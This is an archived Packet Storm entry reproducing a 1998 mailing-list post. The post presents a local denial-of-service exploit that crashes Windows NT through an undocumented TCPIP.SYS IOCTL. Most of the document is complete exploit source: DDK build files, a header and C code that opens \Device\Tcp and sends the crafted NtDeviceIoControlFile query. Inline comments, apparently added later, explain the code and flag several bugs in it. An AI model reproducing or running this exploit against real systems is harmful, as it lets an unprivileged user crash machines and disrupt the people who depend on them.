nt-tcpip-dos.txt

Reported by Packet Storm (type: packetstorm), 17 Aug 1999 00:00:00
Source: packetstormsecurity.com

Exploit that crashes NT systems via an undocumented TCPIP.SYS function; no special rights are required.

`Date: Fri, 25 Sep 1998 18:19:50 +0200  
From: Gigi Mori <[email protected]>  
Subject: Crashing NT with Native Calls  
  
Hi,  
Playing with TCPIP.SYS I've noticed that any user could crash the local system with an IRQL_NOT_LESS_OR_EQUAL exception just by calling the undocumented function NtDeviceIoControlFile with a handle to TCPIP and the "right" parameters.  
NtDeviceIoControlFile is the native counterpart of DeviceIoControl and is called by InetMib1.dll and the WINSOCK Helper DLLs to retrieve TCPIP statistics, so no special rights are needed to run the exploit.  
The bug resides in the TCPIP.SYS InternalIoControl dispatch routine, which lacks a check on the current IRQ level before processing the query information request.  
  
This is the exploit (you should compile it with the DDK):  
  
--------------- begin SOURCES ---------------------------  
  
# Build spec for the NT DDK "build" utility: a user-mode console program  
# linked against the checked ntdll.lib so the Nt*/Zw* native calls resolve.  
TARGETNAME= tcpinfo  
TARGETPATH= .  
TARGETTYPE= PROGRAM  
  
INCLUDES= .; ..\; \DDK\inc;\DDK\src\network\inc  
  
# NOTE: names tcpinfo.c, whereas the listing header further down labels the  
# source file tcpexploit.c — the two do not agree.  
SOURCES= tcpinfo.c  
  
UMTYPE= console  
UMBASE= 0x400000  
UMLIBS= \DDK\lib\i386\checked\ntdll.lib  
--------------- end SOURCES -----------------------------  
--------------- begin makefile --------------------------  
#  
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source  
# file to this component. This file merely indirects to the real make file  
# that is shared by all the driver components of the Windows NT DDK  
#  
  
!INCLUDE $(NTMAKEENV)\makefile.def  
--------------- end makefile ----------------------------  
--------------- begin native.h --------------------------  
#ifndef gigi_native_h  
#define gigi_native_h  
  
/* Caller-side status block handed to NtDeviceIoControlFile as its  
 * IoStatusBlock argument (see tcp_query_information in tcpexploit.c).  
 * Field names are the author's; the first two presumably overlay the  
 * Status/Information slots of IO_STATUS_BLOCK — TODO confirm against the  
 * DDK layout. hevent holds the event handle passed as the call's Event  
 * argument. */  
typedef struct {  
unsigned int bo;  
unsigned int result;  
HANDLE hevent;  
} nt_overlapped;  
  
/* Control code sent to \Device\Tcp. As a CTL_CODE it decodes to device type  
 * 0x12 (FILE_DEVICE_NETWORK), function 0, transfer method 3 (METHOD_NEITHER):  
 * the driver receives the caller's raw buffer pointers, so the dispatch  
 * routine itself has to validate them and the IRQL it runs at — which is  
 * the check the post says is missing. */  
#define IOCTL_TCP_QUERY_INFORMATION 0x120003  
#endif /* gigi_native_h */  
-------------- end native.h ----------------------------  
-------------- begin tcpexploit.c ------------------------  
#include <ntddk.h>  
#include <stdio.h>  
#include <tdiinfo.h>  
#include "native.h"  
  
/* Size of the WCHAR scratch array in open_tcp (which ends up unused). */  
#define MAX_NAME_LEN 256  
  
/* Process-wide state: the \Device\Tcp handle opened by open_tcp and a  
 * 1 KiB (0x400) buffer that main passes as the IOCTL output buffer.  
 * Unnamed struct type with the single instance g. */  
struct {  
HANDLE h_tcp;  
char buff[0x400];  
} g;  
  
  
/* Opens a handle to \Device\Tcp into g.h_tcp with the native ZwCreateFile.  
 * Returns 1 on success, 0 on failure (after printing a diagnostic).  
 * Only a generic access mask is requested, i.e. nothing beyond what an  
 * ordinary user already holds — the post's "no special rights" claim.  
 * Declared with an empty parameter list (pre-prototype style); (void) would  
 * be the modern spelling. */  
unsigned int  
open_tcp()  
{  
OBJECT_ATTRIBUTES object_attrs;  
UNICODE_STRING device_tcp;  
WCHAR device_tcp_buff[MAX_NAME_LEN];  
IO_STATUS_BLOCK io_status_block;  
NTSTATUS status;  
  
/* Dead store: RtlInitUnicodeString on the next line repoints Buffer at the  
 * string literal, so device_tcp_buff is never used. The address of a WCHAR  
 * array is also not a PWSTR, which a strict compiler warns about. */  
device_tcp.Buffer = &device_tcp_buff;  
RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");  
  
InitializeObjectAttributes(&object_attrs, &device_tcp,  
OBJ_CASE_INSENSITIVE, NULL, NULL);  
  
/* DesiredAccess 0x20000000 (appears to be GENERIC_EXECUTE on NT — verify  
 * against the DDK); no allocation size, normal attributes, shared R/W,  
 * FILE_OPEN_IF disposition, no create options and no EA buffer. */  
status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,  
&io_status_block, 0,  
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,  
FILE_OPEN_IF,  
0, NULL, 0);  
if(status != STATUS_SUCCESS) {  
/* Bug: io_status_block is a struct passed where the second %#x expects an  
 * unsigned int — a format/argument mismatch (undefined behaviour) in the  
 * diagnostic path. io_status_block.Status is presumably what was meant. */  
printf("ZwCreateFile error %#x %#x\n", status, io_status_block);  
  
return 0;  
}  
  
return 1;  
}  
  
/* Releases the \Device\Tcp handle opened by open_tcp. The ZwClose status  
 * is ignored and g.h_tcp keeps the stale handle value afterwards. */  
void  
close_tcp()  
{  
ZwClose(g.h_tcp);  
}  
  
/* Issues the TCP query-information IOCTL on g.h_tcp with the caller's  
 * request/response buffers. A temporary event is created for the call,  
 * the NTSTATUS the IOCTL returns is printed (not checked), and the function  
 * returns 1 regardless of that status; 0 is returned only when the event  
 * cannot be created. in_buff_len/out_buff_len are forwarded as given —  
 * nothing here checks that they match the buffers, so the caller is  
 * responsible for them. */  
unsigned int  
tcp_query_information(void *in_buff, unsigned int in_buff_len,  
  
void *out_buff, unsigned int out_buff_len)  
{  
NTSTATUS status;  
nt_overlapped prova;   /* status block + event for the call ("prova" is Italian for "test") */  
unsigned int i, *p;    /* unused locals */  
  
/* Event handle is stored in prova.hevent. 0x1F003 is the access mask as it  
 * appears in the post; EVENT_ALL_ACCESS is 0x1F0003, so this may be a  
 * transcription slip — TODO confirm. Remaining args: no object attributes,  
 * event type 1, initial state NULL/FALSE. */  
status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);  
if(status != STATUS_SUCCESS) {  
/* Bug: "0x#x" contains no conversion specifier, so status is never  
 * printed; "%#x" was evidently intended. */  
printf("NtCreateEvent error 0x#x\n", status);  
  
return 0;  
}  
  
/* Args in order: file handle, event, no APC routine, no APC context,  
 * IoStatusBlock (the nt_overlapped overlay), control code, input buffer and  
 * length, output buffer and length. NOTE: the control-code identifier is  
 * broken across two lines in this listing (a line-wrap artifact); it is  
 * IOCTL_TCP_QUERY_INFORMATION from native.h. */  
status = NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,  
  
&prova,  
IOCTL_TCP_QUERY_INFORMA  
TION,  
  
in_buff,  
in_buff_len,  
  
out_buff,  
out_buff_len);  
  
ZwClose(prova.hevent);  
  
/* IOCTL result, printed in hex and otherwise ignored. */  
printf("%#X\n", status);  
  
return 1;  
}  
  
/* Entry point. Opens \Device\Tcp, fills in only the ID part of a TDI  
 * query-information request and sends it through tcp_query_information  
 * with g.buff as the output buffer. `void __cdecl main()` is non-standard:  
 * main should be declared as returning int. */  
void __cdecl  
main()  
{  
struct tcp_request_query_information_ex in_buff;  
  
if(!open_tcp()) {  
return;  
}  
  
/* Only in_buff.ID is populated: entity CO_TL_ENTITY, instance 0, class  
 * INFO_CLASS_PROTOCOL, type INFO_TYPE_CONNECTION, id 0x5 (a bare number in  
 * the listing; no symbolic name given). Every other byte of in_buff is  
 * uninitialized stack content that gets passed to the kernel. */  
in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;  
in_buff.ID.toi_entity.tei_instance = 0;  
in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;  
in_buff.ID.toi_type = INFO_TYPE_CONNECTION;  
in_buff.ID.toi_id = 0x5;  
  
/* 0x24 is a hard-coded input length, presumably sizeof(in_buff) on the  
 * 32-bit DDK — TODO confirm; sizeof would be the safer spelling. On this  
 * failure path the TCP handle is not closed (process exit reclaims it). */  
if(!tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff))) {  
return;  
}  
  
close_tcp();  
}  
----------------- end tcpexploit.c ---------------------------------  
  
Luigi Mori --  
Symbolic (http://www.symbolic.it)  
`
